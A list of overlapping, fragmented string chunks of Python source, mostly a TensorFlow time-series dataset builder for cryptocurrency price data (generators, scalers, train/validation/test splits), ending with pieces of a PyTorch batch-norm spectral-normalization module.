"check \"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def create_power_trend(self): if self.dataset_profile.scaler ==",
"tensorflow.keras.preprocessing.sequence import TimeseriesGenerator import matplotlib.pyplot as plt import seaborn as sns import tensorflow",
"DSCreator (class): object \"\"\" self.features = DataFeatures(loader) self.dataset_profile = dataset_profile self.dataset = DataSet()",
"left to be used as current step.' % (self.start_index, self.end_index)) self.sample_shape = self.calc_shape()",
"= self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def create_power_trend(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler =",
"self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' y_temp = self.dataset.y_df.values.reshape(-1, 1) if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler =",
"targets, length, sampling_rate=1, stride=1, start_index=0, overlap=0, end_index=None, shuffle=False, reverse=False, batch_size=128): super().__init__(data, targets, length,",
"analyze.dataload import DataLoad from datamodeling.datafeatures import DataFeatures, DSProfile __version__ = 0.0010 def get_local_timezone_name():",
"OneHotEncoder from sklearn.preprocessing import FunctionTransformer from tensorflow.keras.preprocessing.sequence import TimeseriesGenerator import matplotlib.pyplot as plt",
"and (self.y_Test is not None): return self.x_Test, self.y_Test class DSCreator: \"\"\" Class for",
"length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.train_gen def get_val_generator(self, x_Val_data, y_Val_data): self.dataset.val_gen",
"= x_arr[:train_len + self.dataset_profile.gap_timeframes, :] y_Train_data = y_arr[train_len:, :] y_Val_data = y_arr[:train_len +",
"self.sample_shape = np.expand_dims(samples, axis=0).shape sample_shape = (samples.shape[-2], samples.shape[-1],) return sample_shape def __getitem__(self, index):",
"self.sample_shape = self.calc_shape() pass def calc_shape(self): index = 0 i = (self.start_index +",
"self.x_Val, self.y_Val def get_test(self): if (self.x_Test is not None) and (self.y_Test is not",
"self.dataset_profile.train_size + self.dataset_profile.val_size == 1.0: self.dataset.val_df = self.dataset.features_df.iloc[df_train_len + self.dataset_profile.gap_timeframes:, :] return df_train_len,",
"overlap > 0: start_index += overlap self.data = data self.targets = targets self.length",
"object self.targets_scaler = object self.train_gen = None self.val_gen = None self.test_gen = None",
"= np.random.randint( self.start_index, self.end_index + 1, size=self.batch_size) else: i = (self.start_index + self.batch_size",
"df_val_len + df_train_len + self.dataset_profile.gap_timeframes, :] self.dataset.test_df = self.dataset.features_df.iloc[df_rows - df_test_len:, :] return",
"test_len = self.split_data_df() if test_len is None: x_Train_data = x_arr[train_len:, :] x_Val_data =",
"matplotlib.pyplot as plt import seaborn as sns import tensorflow as tf from dataclasses",
"self.dataset.test_gen = TSDataGenerator(data=x_Test_data, targets=y_Test_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.test_gen def",
"y_Test_data): self.dataset.test_gen = TSDataGenerator(data=x_Test_data, targets=y_Test_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.test_gen",
"self.dataset.y_df = self.features.create_y_close1_close2_sub() elif self.dataset_profile.Y_data == \"close1-close2_trend\": self.dataset.y_df = self.features.create_y_close1_close2_sub_trend() self.create_close1_close2_trend() return self.dataset",
"ValueError(f'`overlap={overlap} >= length={length}` is disallowed') if overlap > 0: start_index += overlap self.data",
"return self.dataset.test_gen def create_close1_close2_power(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler =",
"= None else: msg = \"Error: Unknown scaler preparation type\" sys.exit(msg) x_arr =",
"Use from this datetimeindex end_period = None -> Use until [:-1] of historical",
"raise ValueError(f'`overlap={overlap} >= length={length}` is disallowed') if overlap > 0: start_index += overlap",
"' of same length. ' 'Data length is {}'.format(len(data)) + ' while target",
"np import datetime import pandas as pd from typing import Tuple from sklearn.preprocessing",
"import MinMaxScaler from sklearn.preprocessing import RobustScaler from sklearn.preprocessing import LabelEncoder from sklearn.preprocessing import",
"get_train_generator(self, x_Train_data, y_Train_data): self.dataset.train_gen = TSDataGenerator(data=x_Train_data, targets=y_Train_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, )",
"= self.split_data_df() if test_len is None: x_Train_data = x_arr[train_len:, :] x_Val_data = x_arr[:train_len",
"targets have to be' + ' of same length. ' 'Data length is",
"None): return self.x_Train, self.y_Train def get_val(self): if (self.x_Val is not None) and (self.y_Val",
"self.prepare_datagens(x_arr, y_arr) pass def create_power_trend(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler",
"= x_arr[x_arr.shape[0] - test_len:, :] y_Train_data = y_arr[train_len:, :] y_Val_data = y_arr[train_len +",
"as plt import seaborn as sns import tensorflow as tf from dataclasses import",
"= '2021-12-05 23:59:59' -> Use until this datetimeindex source_directory=\"../source_root\" -> Use this directory",
"until this datetimeindex source_directory=\"../source_root\" -> Use this directory to search timeframes directory \"\"\"",
"source_directory=\"../source_root\", start_period='2021-11-01 00:00:00', end_period='2021-12-05 23:59:59', ) dataset_1_profile = DSProfile() dsc = DSCreator(loaded_crypto_data, dataset_1_profile)",
"load start_period = None -> Use from [0:] of historical data start_period =",
"dataset configuration we are using DSConstants dataclass (profile) \"\"\" def __init__(self, loader: DataLoad,",
"of historical data start_period = '2021-09-01 00:00:00' -> Use from this datetimeindex end_period",
">= length: raise ValueError(f'`overlap={overlap} >= length={length}` is disallowed') if overlap > 0: start_index",
"\"ETHUSDT\") -> Use only this pairs to load time_intervals = None -> Use",
"\"close1-close2\": self.dataset.y_df = self.features.create_y_close1_close2_sub() elif self.dataset_profile.Y_data == \"close1-close2_trend\": self.dataset.y_df = self.features.create_y_close1_close2_sub_trend() self.create_close1_close2_trend() return",
"'would be left to be used as current step.' % (self.start_index, self.end_index)) self.sample_shape",
"length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.val_gen def get_test_generator(self, x_Test_data, y_Test_data): self.dataset.test_gen",
"TSDataGenerator(data=x_arr, targets=y_arr, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, batch_size=x_arr.shape[0] ) for x_data, y_data in",
"None self.input_shape = None pass def get_train(self): if (self.x_Train is not None) and",
"self.y_Val = None self.x_Test = None self.y_Test = None self.features_scaler = object self.targets_scaler",
"for DataLoad class ------------------------ pairs_symbol = None -> Use all pairs in timeframe",
"None self.y_df = None self.x_Train = None self.y_Train = None self.x_Val = None",
"target length is {}'.format(len(targets))) if overlap >= length: raise ValueError(f'`overlap={overlap} >= length={length}` is",
"y_Train_data) self.dataset.x_Val, self.dataset.y_Val = self.create_data_from_gen(x_Val_data, y_Val_data) self.dataset.input_shape = x_Val_gen.sample_shape pass def create_dataset(self) ->",
"\"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def create_power_trend(self): if self.dataset_profile.scaler == \"robust\":",
"int(df_rows * self.dataset_profile.val_size) df_test_len = df_rows - (df_train_len + self.dataset_profile.gap_timeframes) - (df_val_len +",
"class TSDataGenerator(TimeseriesGenerator): def __init__(self, data, targets, length, sampling_rate=1, stride=1, start_index=0, overlap=0, end_index=None, shuffle=False,",
"targets @dataclass class DataSet: def __init__(self): self.name: str = '' self.dataset_profile = DSProfile()",
"None: x_Train_data = x_arr[train_len:, :] x_Val_data = x_arr[:train_len + self.dataset_profile.gap_timeframes, :] y_Train_data =",
"Use all timeframes directories for loading (with pairs_symbols) time_intervals = ['15m'] -> Use",
"self.y_Train def get_val(self): if (self.x_Val is not None) and (self.y_Val is not None):",
"self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def prepare_datagens(self, x_arr,",
"import RobustScaler from sklearn.preprocessing import LabelEncoder from sklearn.preprocessing import LabelBinarizer from sklearn.preprocessing import",
"f\"{offset_hour:.0f}\" if offset_hour > 0: offset_hour_msg = f\"+{offset_hour:.0f}\" return f'Etc/GMT{offset_hour_msg}' class TSDataGenerator(TimeseriesGenerator): def",
"import matplotlib.pyplot as plt import seaborn as sns import tensorflow as tf from",
"FunctionTransformer from tensorflow.keras.preprocessing.sequence import TimeseriesGenerator import matplotlib.pyplot as plt import seaborn as sns",
"from sklearn.preprocessing import RobustScaler from sklearn.preprocessing import LabelEncoder from sklearn.preprocessing import LabelBinarizer from",
"time import copy import pytz import numpy as np import datetime import pandas",
"= TSDataGenerator(data=x_Train_data, targets=y_Train_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.train_gen def get_val_generator(self,",
"self.dataset.targets_scaler = None else: msg = \"Error: Unknown scaler preparation type\" sys.exit(msg) x_arr",
"0.0010 def get_local_timezone_name(): if time.daylight: offset_hour = time.altzone / 3600 else: offset_hour =",
"self.calc_shape() pass def calc_shape(self): index = 0 i = (self.start_index + self.batch_size *",
"this directory to search timeframes directory \"\"\" loaded_crypto_data = DataLoad(pairs_symbols=None, time_intervals=['15m'], source_directory=\"../source_root\", start_period='2021-11-01",
"self.get_val_generator(x_Val_data, y_Val_data) self.dataset.x_Train, self.dataset.y_Train = self.create_data_from_gen(x_Train_data, y_Train_data) self.dataset.x_Val, self.dataset.y_Val = self.create_data_from_gen(x_Val_data, y_Val_data) self.dataset.input_shape",
"with data Returns: DSCreator (class): object \"\"\" self.features = DataFeatures(loader) self.dataset_profile = dataset_profile",
"__name__ == \"__main__\": \"\"\" Usage for DataLoad class ------------------------ pairs_symbol = None ->",
"df_val_len, df_test_len def get_train_generator(self, x_Train_data, y_Train_data): self.dataset.train_gen = TSDataGenerator(data=x_Train_data, targets=y_Train_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride,",
"# self.sample_shape = np.expand_dims(samples, axis=0).shape sample_shape = (samples.shape[-2], samples.shape[-1],) return sample_shape def __getitem__(self,",
"else: x_Train_data = x_arr[train_len:, :] x_Val_data = x_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes +",
"y_arr) pass def prepare_datagens(self, x_arr, y_arr): train_len, val_len, test_len = self.split_data_df() if test_len",
"TimeseriesGenerator import matplotlib.pyplot as plt import seaborn as sns import tensorflow as tf",
"sampling_rate=1, stride=1, start_index=0, overlap=0, end_index=None, shuffle=False, reverse=False, batch_size=128): super().__init__(data, targets, length, sampling_rate, stride,",
"def get_val_generator(self, x_Val_data, y_Val_data): self.dataset.val_gen = TSDataGenerator(data=x_Val_data, targets=y_Val_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap,",
"time to have solid data \"\"\" x_Train_gen = self.get_train_generator(x_Train_data, y_Train_data) x_Val_gen = self.get_val_generator(x_Val_data,",
"directory to search timeframes directory \"\"\" loaded_crypto_data = DataLoad(pairs_symbols=None, time_intervals=['15m'], source_directory=\"../source_root\", start_period='2021-11-01 00:00:00',",
"period loaded to memory Args: loader (DataLoad): object with data Returns: DSCreator (class):",
"x_Val_gen.sample_shape pass def create_dataset(self) -> DataSet: self.dataset.dataset_profile = DSProfile() self.dataset.features_df = self.features.collect_features(self.dataset_profile) self.dataset.name",
"= x_Val_gen.sample_shape pass def create_dataset(self) -> DataSet: self.dataset.dataset_profile = DSProfile() self.dataset.features_df = self.features.collect_features(self.dataset_profile)",
"np.array([self.data[row - self.overlap - self.length:row:self.sampling_rate] for row in rows]) # self.sample_shape = samples.shape",
"from sklearn.preprocessing import LabelEncoder from sklearn.preprocessing import LabelBinarizer from sklearn.preprocessing import OneHotEncoder from",
"search timeframes directory \"\"\" loaded_crypto_data = DataLoad(pairs_symbols=None, time_intervals=['15m'], source_directory=\"../source_root\", start_period='2021-11-01 00:00:00', end_period='2021-12-05 23:59:59',",
":] x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using generator 1 time to have solid",
"self.val_gen = None self.test_gen = None self.input_shape = None pass def get_train(self): if",
"is {}'.format(len(data)) + ' while target length is {}'.format(len(targets))) if overlap >= length:",
"- self.length:row:self.sampling_rate] for row in rows]) # self.sample_shape = np.expand_dims(samples, axis=0).shape sample_shape =",
"DataSet() def split_data_df(self): df_rows = self.dataset.features_df.shape[0] df_train_len = int(df_rows * self.dataset_profile.train_size) df_val_len =",
"self.overlap = overlap if end_index is None: end_index = len(data) - 1 self.end_index",
"not None): return self.x_Test, self.y_Test class DSCreator: \"\"\" Class for dataset creation for",
"y_arr) return self.dataset def create_data_from_gen(self, x_arr, y_arr): gen = TSDataGenerator(data=x_arr, targets=y_arr, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate,",
"timeframes from this list to load start_period = None -> Use from [0:]",
"LabelBinarizer from sklearn.preprocessing import OneHotEncoder from sklearn.preprocessing import FunctionTransformer from tensorflow.keras.preprocessing.sequence import TimeseriesGenerator",
"return self.dataset elif self.dataset_profile.Y_data == \"power_trend\": weight = self.dataset.dataset_profile.power_trend self.dataset.y_df = self.features.create_power_trend(weight) self.create_power_trend()",
"self.sample_shape = samples.shape targets = np.array([self.targets[row] for row in rows]) if self.reverse: return",
"self.end_index: raise ValueError('`start_index+length=%i > end_index=%i` ' 'is disallowed, as no part of the",
"for loading (with pairs_symbols) time_intervals = ['15m'] -> Use timeframes from this list",
"is not None) and (self.y_Val is not None): return self.x_Val, self.y_Val def get_test(self):",
"self.y_Val def get_test(self): if (self.x_Test is not None) and (self.y_Test is not None):",
"pairs_symbols) time_intervals = ['15m'] -> Use timeframes from this list to load start_period",
"== \"close1-close2_trend\": self.dataset.y_df = self.features.create_y_close1_close2_sub_trend() self.create_close1_close2_trend() return self.dataset elif self.dataset_profile.Y_data == \"close1-close2_power\": self.dataset.y_df",
"MinMaxScaler from sklearn.preprocessing import RobustScaler from sklearn.preprocessing import LabelEncoder from sklearn.preprocessing import LabelBinarizer",
"def __init__(self): self.name: str = '' self.dataset_profile = DSProfile() self.features_df = None self.y_df",
"self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def prepare_datagens(self, x_arr, y_arr): train_len, val_len, test_len = self.split_data_df()",
"DSConstants dataclass (profile) \"\"\" def __init__(self, loader: DataLoad, dataset_profile: DSProfile): \"\"\" Getting object",
"self.end_index + 1, size=self.batch_size) else: i = (self.start_index + self.batch_size * self.stride *",
"data end_period = '2021-12-05 23:59:59' -> Use until this datetimeindex source_directory=\"../source_root\" -> Use",
"y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def prepare_datagens(self, x_arr, y_arr): train_len, val_len, test_len",
"y_Val_data): self.dataset.val_gen = TSDataGenerator(data=x_Val_data, targets=y_Val_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.val_gen",
"loading (with pairs_symbols) time_intervals = ['15m'] -> Use timeframes from this list to",
"self.data = data self.targets = targets self.length = length self.sampling_rate = sampling_rate self.stride",
"index) rows = np.arange(i, min(i + self.batch_size * self.stride, self.end_index + 1), self.stride)",
"data \"\"\" x_Train_gen = self.get_train_generator(x_Train_data, y_Train_data) x_Val_gen = self.get_val_generator(x_Val_data, y_Val_data) self.dataset.x_Train, self.dataset.y_Train =",
"get_val(self): if (self.x_Val is not None) and (self.y_Val is not None): return self.x_Val,",
"this datetimeindex end_period = None -> Use until [:-1] of historical data end_period",
"0: offset_hour_msg = f\"+{offset_hour:.0f}\" return f'Etc/GMT{offset_hour_msg}' class TSDataGenerator(TimeseriesGenerator): def __init__(self, data, targets, length,",
"self.create_close1_close2_trend() return self.dataset elif self.dataset_profile.Y_data == \"close1-close2_power\": self.dataset.y_df = self.features.create_y_close1_close2_sub_power() self.create_close1_close2_power() return self.dataset",
"self.x_Val = None self.y_Val = None self.x_Test = None self.y_Test = None self.features_scaler",
"y_Val_data = y_arr[:train_len + self.dataset_profile.gap_timeframes, :] else: x_Train_data = x_arr[train_len:, :] x_Val_data =",
"= self.create_data_from_gen(x_Val_data, y_Val_data) self.dataset.input_shape = x_Val_gen.sample_shape pass def create_dataset(self) -> DataSet: self.dataset.dataset_profile =",
"row in rows]) # self.sample_shape = np.expand_dims(samples, axis=0).shape sample_shape = (samples.shape[-2], samples.shape[-1],) return",
"x_data, y_data in gen: continue return x_data, y_data def save_dataset_arrays(self, path_filename): pass if",
"dataset creation for dataset configuration we are using DSConstants dataclass (profile) \"\"\" def",
"- df_test_len:, :] return df_train_len, df_val_len, df_test_len def get_train_generator(self, x_Train_data, y_Train_data): self.dataset.train_gen =",
"raise ValueError('Data and targets have to be' + ' of same length. '",
"import LabelEncoder from sklearn.preprocessing import LabelBinarizer from sklearn.preprocessing import OneHotEncoder from sklearn.preprocessing import",
"numpy as np import datetime import pandas as pd from typing import Tuple",
"part of the sequence ' 'would be left to be used as current",
"else: i = (self.start_index + self.batch_size * self.stride * index) rows = np.arange(i,",
"self.start_index > self.end_index: raise ValueError('`start_index+length=%i > end_index=%i` ' 'is disallowed, as no part",
"offset_hour = time.altzone / 3600 else: offset_hour = time.timezone / 3600 offset_hour_msg =",
"> 0: start_index += overlap self.data = data self.targets = targets self.length =",
"DataFeatures(loader) self.dataset_profile = dataset_profile self.dataset = DataSet() def split_data_df(self): df_rows = self.dataset.features_df.shape[0] df_train_len",
"self.split_data_df() if test_len is None: x_Train_data = x_arr[train_len:, :] x_Val_data = x_arr[:train_len +",
"1) if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = RobustScaler().fit(y_temp) else: msg",
"check \"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def create_close1_close2_trend(self): if self.dataset_profile.scaler ==",
"import dataclass from analyze.dataload import DataLoad from datamodeling.datafeatures import DataFeatures, DSProfile __version__ =",
"x_arr, y_arr): train_len, val_len, test_len = self.split_data_df() if test_len is None: x_Train_data =",
"self.create_close1_close2_power() return self.dataset elif self.dataset_profile.Y_data == \"power_trend\": weight = self.dataset.dataset_profile.power_trend self.dataset.y_df = self.features.create_power_trend(weight)",
"shuffle, reverse, batch_size) if len(data) != len(targets): raise ValueError('Data and targets have to",
"'2021-09-01 00:00:00' -> Use from this datetimeindex end_period = None -> Use until",
"[:-1] of historical data end_period = '2021-12-05 23:59:59' -> Use until this datetimeindex",
"from analyze.dataload import DataLoad from datamodeling.datafeatures import DataFeatures, DSProfile __version__ = 0.0010 def",
"pass def create_dataset(self) -> DataSet: self.dataset.dataset_profile = DSProfile() self.dataset.features_df = self.features.collect_features(self.dataset_profile) self.dataset.name =",
"= samples.shape targets = np.array([self.targets[row] for row in rows]) if self.reverse: return samples[:,",
"-> Use only this pairs to load time_intervals = None -> Use all",
"__init__(self, loader: DataLoad, dataset_profile: DSProfile): \"\"\" Getting object with OHLCV data (symbols and",
"df_test_len def get_train_generator(self, x_Train_data, y_Train_data): self.dataset.train_gen = TSDataGenerator(data=x_Train_data, targets=y_Train_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index,",
"pass def create_close1_close2_trend(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None",
"self.dataset.train_df = self.dataset.features_df.iloc[:df_train_len, :] if self.dataset_profile.train_size + self.dataset_profile.val_size == 1.0: self.dataset.val_df = self.dataset.features_df.iloc[df_train_len",
"= None self.input_shape = None pass def get_train(self): if (self.x_Train is not None)",
"from tensorflow.keras.preprocessing.sequence import TimeseriesGenerator import matplotlib.pyplot as plt import seaborn as sns import",
"self.dataset else: msg = \"Error: Unknown dataset preparation type\" sys.exit(msg) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}'",
"Use all pairs in timeframe directory pairs_symbol = (\"BTCUSDT\", \"ETHUSDT\") -> Use only",
"from sklearn.preprocessing import LabelBinarizer from sklearn.preprocessing import OneHotEncoder from sklearn.preprocessing import FunctionTransformer from",
"dataset preparation type\" sys.exit(msg) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' y_temp = self.dataset.y_df.values.reshape(-1, 1) if self.dataset_profile.scaler",
"= self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def create_power_trend(self):",
"get_val_generator(self, x_Val_data, y_Val_data): self.dataset.val_gen = TSDataGenerator(data=x_Val_data, targets=y_Val_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, )",
"+ val_len, :] y_Test_data = y_arr[x_arr.shape[0] - test_len:, :] x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data)",
"class DataSet: def __init__(self): self.name: str = '' self.dataset_profile = DSProfile() self.features_df =",
"not None) and (self.y_Val is not None): return self.x_Val, self.y_Val def get_test(self): if",
"loaded to memory Args: loader (DataLoad): object with data Returns: DSCreator (class): object",
"have to be' + ' of same length. ' 'Data length is {}'.format(len(data))",
"df_val_len, None else: df_val_len = int(df_rows * self.dataset_profile.val_size) df_test_len = df_rows - (df_train_len",
"import tensorflow as tf from dataclasses import dataclass from analyze.dataload import DataLoad from",
"we are using DSConstants dataclass (profile) \"\"\" def __init__(self, loader: DataLoad, dataset_profile: DSProfile):",
"-> Use timeframes from this list to load start_period = None -> Use",
"of same length. ' 'Data length is {}'.format(len(data)) + ' while target length",
"if end_index is None: end_index = len(data) - 1 self.end_index = end_index self.shuffle",
"DSCreator: \"\"\" Class for dataset creation for dataset configuration we are using DSConstants",
"1.0: self.dataset.val_df = self.dataset.features_df.iloc[df_train_len + self.dataset_profile.gap_timeframes:, :] return df_train_len, df_val_len, None else: df_val_len",
"None) and (self.y_Test is not None): return self.x_Test, self.y_Test class DSCreator: \"\"\" Class",
"self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :] x_Test_data = x_arr[x_arr.shape[0] - test_len:, :] y_Train_data",
"= None self.x_Train = None self.y_Train = None self.x_Val = None self.y_Val =",
"y_Test_data) \"\"\" Using generator 1 time to have solid data \"\"\" x_Train_gen =",
"\"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def prepare_datagens(self, x_arr, y_arr): train_len, val_len,",
"+ self.dataset_profile.gap_timeframes) self.dataset.train_df = self.dataset.features_df.iloc[:df_train_len, :] if self.dataset_profile.train_size + self.dataset_profile.val_size == 1.0: self.dataset.val_df",
"+ self.dataset_profile.gap_timeframes, :] self.dataset.test_df = self.dataset.features_df.iloc[df_rows - df_test_len:, :] return df_train_len, df_val_len, df_test_len",
"* self.stride, self.end_index + 1), self.stride) samples = np.array([self.data[row - self.overlap - self.length:row:self.sampling_rate]",
"= self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def prepare_datagens(self, x_arr, y_arr): train_len, val_len, test_len =",
"self.dataset_profile.gap_timeframes) self.dataset.val_df = self.dataset.features_df.iloc[ df_train_len + self.dataset_profile.gap_timeframes: df_val_len + df_train_len + self.dataset_profile.gap_timeframes, :]",
"self.dataset.val_gen = TSDataGenerator(data=x_Val_data, targets=y_Val_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.val_gen def",
"pytz import numpy as np import datetime import pandas as pd from typing",
"OHLCV data (symbols and timeframes). All data with chosen period loaded to memory",
"directory pairs_symbol = (\"BTCUSDT\", \"ETHUSDT\") -> Use only this pairs to load time_intervals",
"00:00:00' -> Use from this datetimeindex end_period = None -> Use until [:-1]",
"creation for dataset configuration we are using DSConstants dataclass (profile) \"\"\" def __init__(self,",
"Using generator 1 time to have solid data \"\"\" x_Train_gen = self.get_train_generator(x_Train_data, y_Train_data)",
"= TSDataGenerator(data=x_arr, targets=y_arr, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, batch_size=x_arr.shape[0] ) for x_data, y_data",
"return x_data, y_data def save_dataset_arrays(self, path_filename): pass if __name__ == \"__main__\": \"\"\" Usage",
"self.stride * index) rows = np.arange(i, min(i + self.batch_size * self.stride, self.end_index +",
"None) and (self.y_Train is not None): return self.x_Train, self.y_Train def get_val(self): if (self.x_Val",
"= df_rows - (df_train_len + self.dataset_profile.gap_timeframes) self.dataset.train_df = self.dataset.features_df.iloc[:df_train_len, :] if self.dataset_profile.train_size +",
"def create_data_from_gen(self, x_arr, y_arr): gen = TSDataGenerator(data=x_arr, targets=y_arr, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap,",
"reverse, batch_size) if len(data) != len(targets): raise ValueError('Data and targets have to be'",
"targets=y_Val_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.val_gen def get_test_generator(self, x_Test_data, y_Test_data):"
] |
[
"optional): epsilon for numerical stability in calculating norms Returns: The original module with",
"\"bias\") delattr(module, self.name) delattr(module, self.name + '_orig') delattr(module, \"bias\") delattr(module, \"bias_orig\") module.register_parameter(self.name, torch.nn.Parameter(weight.detach()))",
"reparameterization from a module. Args: module (nn.Module): containing module name (str, optional): name",
"the dimension of the weight tensor is greater than 2, it is reshaped",
"buffer, which will cause weight to be included in the state dict #",
"need to assign weight back as fn.name because all sorts of # things",
"name of weight parameter Example: >>> m = spectral_norm(nn.Linear(40, 10)) >>> remove_spectral_norm(m) \"\"\"",
"weight to be included in the state dict # and also supports nn.init",
".. _`Spectral Normalization for Generative Adversarial Networks`: https://arxiv.org/abs/1802.05957 Args: module (nn.Module): containing module",
"module, inputs): if module.training: weight, bias = self.compute_weight(module) setattr(module, self.name, weight) setattr(module, \"bias\",",
"all sorts of # things may assume that it exists, e.g., when initializing",
"\"bias\").detach_().requires_grad_(bias_r_g) @staticmethod def apply(module, name, sigma, eps): fn = BatchNormSpectralNorm(name, sigma, eps) weight",
"cur_sigma = torch.max(torch.abs(weight / torch.sqrt(running_var))) # print(cur_sigma) cur_sigma = max(float(cur_sigma.cpu().detach().numpy()), self.sigma) # print(cur_sigma)",
"as fn.name because all sorts of # things may assume that it exists,",
"return module def remove_bn_spectral_norm(module, name='weight'): r\"\"\"Removes the spectral normalization reparameterization from a module.",
"borrowed from https://arxiv.org/abs/1802.05957 SN for batch normalization layers to be of Lipschtz constant",
"to be of Lipschtz constant sigma (default=1.0). \"\"\" import torch from torch.nn.parameter import",
"setattr(module, self.name, weight) setattr(module, \"bias\", bias) else: weight_r_g = getattr(module, self.name + '_orig').requires_grad",
"\"\"\" BatchNormSpectralNorm.apply(module, name, sigma, eps) return module def remove_bn_spectral_norm(module, name='weight'): r\"\"\"Removes the spectral",
"weight tensor with spectral norm :math:`\\sigma` of the weight matrix calculated using power",
"eps def compute_weight(self, module): weight = getattr(module, self.name + '_orig') bias = getattr(module,",
"Example:: >>> m = batchnorm_spectral_norm(nn.BatchNorm2d(10)) BatchNorm2d(10, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True) >>> m.weight_orig.size() torch.Size([10])",
"= getattr(module, \"bias_orig\").requires_grad getattr(module, self.name).detach_().requires_grad_(weight_r_g) getattr(module, \"bias\").detach_().requires_grad_(bias_r_g) @staticmethod def apply(module, name, sigma, eps):",
"using power iteration method. If the dimension of the weight tensor is greater",
"norms Returns: The original module with the spectal norm hook Example:: >>> m",
